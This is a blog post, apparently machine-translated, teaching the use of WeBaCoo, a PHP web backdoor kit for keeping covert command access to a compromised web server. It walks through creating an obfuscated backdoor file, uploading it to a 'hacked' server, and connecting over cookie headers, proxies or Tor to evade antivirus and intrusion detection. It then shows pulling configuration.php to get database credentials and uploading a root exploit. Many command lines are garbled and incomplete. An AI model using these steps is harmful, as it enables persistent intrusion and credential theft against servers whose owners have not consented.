Sunday, September 22, 2013


WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked).
WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header’s Cookie validating HTTP requests and responses from the web server.
WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the “terminal” mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired.
In many cases, this tool is used when a server does not have the Netcat.
git clone git :/ / / anestisb / WeBaCoo.git
. /
1) Create obfuscated backdoor ‘backdoor.php’ with default settings:
. / backdoor.php
2) Create ‘raw-backdoor.php’ backdoor de-obfuscated using the work “transit”
. / raw-backdoor.php-f 4-r
3) Set “terminal” connection to the remote host using the default settings:
. /
4) Set “terminal” connection to the remote host to configure some arguments:
. / “Test-Cookie”-d “TTT”
5) Set “terminal” connection to the remote host via HTTP proxy:
. /
6) Set “terminal” connection to the remote host via HTTP proxy with basic authentication:
. / user: password:
7) Set “terminal” connection to the remote host via Tor and record activity:
. / tor-l webacoo_log.txt
Now, having installed the tool and knowing the commands, we will create the backdoor to get connection to the web server from the console.
For this case I obtained any server (hacked) where I’ll upload the backdoor that creare with the following command:
. / backdoor.php
The backdoor.php is created and placed in the folder of files (WeBaCoo), then go up the file to the server (hacked) and proceed to connect to the server with the following command:
The connection to the server is perfect, so you get very fast connection.
Simple commands:
In this case will place “load” to see the commands that will handle the entire server, which are:
1) MySQL-CLI: MySQL Command Line Module:
mysql-cli (ex. ‘mysql-cli admin pass’)
2) PSQL-CLI: Postgres Command Line Module:
psql-cli (ex. ‘testdb psql-cli root pass’)
3) Upload: File Upload Module:
upload (ex. ‘upload exploit.c / tmp /’)
4) Download: File Download Module:
download (ex. ‘download config.php’)
5) Stealth: Stealth Enhance Module
stealth (ex. ‘stealth / var / www / html’)
These commands are easy to use, do a brief demonstration with MySQL-CLI command for db and connect to the server.
1) Download the configuration file:
download configuration.php
2) Open the configuration.php file copy of the MySQL user and password, you type the command:
mysql-cli db_user db_password
3) The tool will connect to MySQL, we can only type show databases; to appreciate all the DB.
Similarly use other commands to upload a local root exploit or download any server.
Now with this tool you no longer need to have the web server or make a BackConnection Netcat often fails, to connect to a web server.
I hope they can.

No comments:

Post a Comment